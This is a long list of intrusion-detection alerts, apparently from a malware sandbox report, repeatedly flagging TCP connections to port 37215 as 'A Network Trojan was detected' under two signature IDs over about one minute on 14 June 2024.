                SID:2829579
                Source Port:35448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943190
                SID:2835222
                Source Port:57416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549458
                SID:2835222
                Source Port:42582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.161335
                SID:2835222
                Source Port:45998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291897
                SID:2835222
                Source Port:45030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422109
                SID:2829579
                Source Port:50422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.992043
                SID:2835222
                Source Port:50646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666391
                SID:2835222
                Source Port:52130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184331
                SID:2835222
                Source Port:54690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031806
                SID:2835222
                Source Port:60542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.334628
                SID:2835222
                Source Port:54414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159957
                SID:2835222
                Source Port:46182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501888
                SID:2829579
                Source Port:46740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829390
                SID:2829579
                Source Port:34456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760679
                SID:2829579
                Source Port:38208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013420
                SID:2829579
                Source Port:33770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051512
                SID:2835222
                Source Port:36180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132438
                SID:2835222
                Source Port:32900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071682
                SID:2835222
                Source Port:44488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663781
                SID:2835222
                Source Port:59080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367980
                SID:2829579
                Source Port:36086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020171
                SID:2829579
                Source Port:35006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663289
                SID:2829579
                Source Port:52520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792509
                SID:2829579
                Source Port:35426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847013
                SID:2829579
                Source Port:46440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.027700
                SID:2835222
                Source Port:60362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881472
                SID:2829579
                Source Port:51128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808814
                SID:2835222
                Source Port:49048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991009
                SID:2835222
                Source Port:47156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504812
                SID:2829579
                Source Port:42778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917528
                SID:2829579
                Source Port:41356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944087
                SID:2835222
                Source Port:41524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943438
                SID:2829579
                Source Port:45828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470436
                SID:2829579
                Source Port:54126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324958
                SID:2835222
                Source Port:42036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022714
                SID:2829579
                Source Port:54886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640901
                SID:2835222
                Source Port:50048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185960
                SID:2829579
                Source Port:35868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289770
                SID:2835222
                Source Port:52852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227499
                SID:2829579
                Source Port:45118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858976
                SID:2829579
                Source Port:59850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082527
                SID:2829579
                Source Port:33998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661574
                SID:2829579
                Source Port:38104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148369
                SID:2829579
                Source Port:44606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275558
                SID:2829579
                Source Port:55244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275775
                SID:2835222
                Source Port:41474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504328
                SID:2829579
                Source Port:49120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471118
                SID:2835222
                Source Port:51284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980869
                SID:2835222
                Source Port:48240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321121
                SID:2829579
                Source Port:58958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179336
                SID:2835222
                Source Port:48854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.224520
                SID:2835222
                Source Port:51210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384245
                SID:2829579
                Source Port:54540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672514
                SID:2835222
                Source Port:44688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151460
                SID:2835222
                Source Port:49248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.015750
                SID:2829579
                Source Port:40606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813243
                SID:2829579
                Source Port:46948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940757
                SID:2829579
                Source Port:52294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273936
                SID:2835222
                Source Port:36056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860213
                SID:2835222
                Source Port:55660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028004
                SID:2835222
                Source Port:40946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274402
                SID:2835222
                Source Port:35370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199024
                SID:2835222
                Source Port:46522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914652
                SID:2829579
                Source Port:44888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180449
                SID:2829579
                Source Port:46744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292418
                SID:2835222
                Source Port:56422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184216
                SID:2835222
                Source Port:46336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790265
                SID:2835222
                Source Port:38506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984714
                SID:2829579
                Source Port:45672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.764040
                SID:2829579
                Source Port:52198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563586
                SID:2829579
                Source Port:48464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326413
                SID:2829579
                Source Port:58272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989766
                SID:2829579
                Source Port:57832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521650
                SID:2829579
                Source Port:41222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365636
                SID:2829579
                Source Port:50186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813311
                SID:2835222
                Source Port:46284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326199
                SID:2835222
                Source Port:53550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112279
                SID:2835222
                Source Port:35680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718808
                SID:2829579
                Source Port:47486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831363
                SID:2835222
                Source Port:36632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932732
                SID:2835222
                Source Port:46728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789827
                SID:2829579
                Source Port:45324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152436
                SID:2835222
                Source Port:42536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382695
                SID:2829579
                Source Port:43924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146198
                SID:2829579
                Source Port:45354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150757
                SID:2835222
                Source Port:54722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412248
                SID:2829579
                Source Port:39266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343325
                SID:2835222
                Source Port:52660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341235
                SID:2829579
                Source Port:42438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.113964
                SID:2835222
                Source Port:35236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012865
                SID:2835222
                Source Port:47902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.764014
                SID:2829579
                Source Port:51240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765803
                SID:2829579
                Source Port:52816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830105
                SID:2829579
                Source Port:47942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.081959
                SID:2829579
                Source Port:48426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827618
                SID:2829579
                Source Port:48562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411072
                SID:2835222
                Source Port:53928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729444
                SID:2829579
                Source Port:50694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763184
                SID:2829579
                Source Port:37086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968693
                SID:2835222
                Source Port:45742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000335
                SID:2829579
                Source Port:38194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001296
                SID:2829579
                Source Port:40010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676607
                SID:2829579
                Source Port:60730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813102
                SID:2829579
                Source Port:36190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716612
                SID:2835222
                Source Port:57890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861740
                SID:2829579
                Source Port:51792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052293
                SID:2835222
                Source Port:40806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029256
                SID:2829579
                Source Port:46040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365457
                SID:2835222
                Source Port:41934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.050793
                SID:2829579
                Source Port:34912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806950
                SID:2835222
                Source Port:41634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663517
                SID:2835222
                Source Port:39874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030269
                SID:2835222
                Source Port:34994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878388
                SID:2829579
                Source Port:48612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366157
                SID:2829579
                Source Port:38522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969565
                SID:2829579
                Source Port:36316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.899180
                SID:2829579
                Source Port:58692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763885
                SID:2829579
                Source Port:38350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980105
                SID:2835222
                Source Port:41772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073634
                SID:2829579
                Source Port:47014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666573
                SID:2829579
                Source Port:35666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718269
                SID:2835222
                Source Port:49556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367643
                SID:2835222
                Source Port:50846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968103
                SID:2829579
                Source Port:41224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071172
                SID:2835222
                Source Port:39352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186431
                SID:2835222
                Source Port:46936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618666
                SID:2835222
                Source Port:57780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.910457
                SID:2829579
                Source Port:42952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321655
                SID:2829579
                Source Port:59768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031208
                SID:2835222
                Source Port:33536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367404
                SID:2829579
                Source Port:43048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977526
                SID:2835222
                Source Port:50944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544683
                SID:2829579
                Source Port:47822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202062
                SID:2829579
                Source Port:51774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803222
                SID:2829579
                Source Port:35670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941838
                SID:2829579
                Source Port:39970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163518
                SID:2829579
                Source Port:49386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882704
                SID:2835222
                Source Port:43002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672015
                SID:2835222
                Source Port:59706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703770
                SID:2829579
                Source Port:49066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704463
                SID:2835222
                Source Port:44486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019557
                SID:2829579
                Source Port:60470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.224720
                SID:2835222
                Source Port:50850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.947315
                SID:2835222
                Source Port:60650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548560
                SID:2829579
                Source Port:57764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.086249
                SID:2829579
                Source Port:43754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792891
                SID:2835222
                Source Port:44130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472258
                SID:2829579
                Source Port:35622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860637
                SID:2829579
                Source Port:57978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182760
                SID:2829579
                Source Port:49138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668018
                SID:2829579
                Source Port:44954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717107
                SID:2835222
                Source Port:37052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054602
                SID:2835222
                Source Port:46008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725941
                SID:2835222
                Source Port:58404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805790
                SID:2829579
                Source Port:59672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150058
                SID:2835222
                Source Port:51986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052165
                SID:2835222
                Source Port:34880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369098
                SID:2835222
                Source Port:36412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200711
                SID:2835222
                Source Port:42888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185897
                SID:2835222
                Source Port:52812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828153
                SID:2835222
                Source Port:37358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227099
                SID:2835222
                Source Port:49234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568808
                SID:2829579
                Source Port:48752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916139
                SID:2829579
                Source Port:48286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943485
                SID:2835222
                Source Port:51062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201359
                SID:2829579
                Source Port:40700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967082
                SID:2829579
                Source Port:38270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339083
                SID:2835222
                Source Port:40980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806558
                SID:2829579
                Source Port:42924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966055
                SID:2835222
                Source Port:57102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618619
                SID:2829579
                Source Port:56596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028363
                SID:2835222
                Source Port:42384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761948
                SID:2835222
                Source Port:35654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000256
                SID:2829579
                Source Port:60264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811399
                SID:2835222
                Source Port:51902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072078
                SID:2835222
                Source Port:55734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803873
                SID:2829579
                Source Port:55772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779891
                SID:2835222
                Source Port:40632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913699
                SID:2835222
                Source Port:38718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735568
                SID:2829579
                Source Port:39364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662201
                SID:2829579
                Source Port:50816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469615
                SID:2835222
                Source Port:47200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878903
                SID:2829579
                Source Port:34718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810107
                SID:2835222
                Source Port:45190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186256
                SID:2829579
                Source Port:43392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702509
                SID:2835222
                Source Port:53138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985001
                SID:2829579
                Source Port:34904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.085265
                SID:2829579
                Source Port:57476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969529
                SID:2829579
                Source Port:37600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519490
                SID:2829579
                Source Port:46846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878734
                SID:2829579
                Source Port:50746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703214
                SID:2835222
                Source Port:51232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143684
                SID:2829579
                Source Port:44356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245083
                SID:2835222
                Source Port:51840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776454
                SID:2829579
                Source Port:50108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915917
                SID:2835222
                Source Port:38532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.090861
                SID:2829579
                Source Port:43950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226614
                SID:2835222
                Source Port:40598
                Destination Port:37215
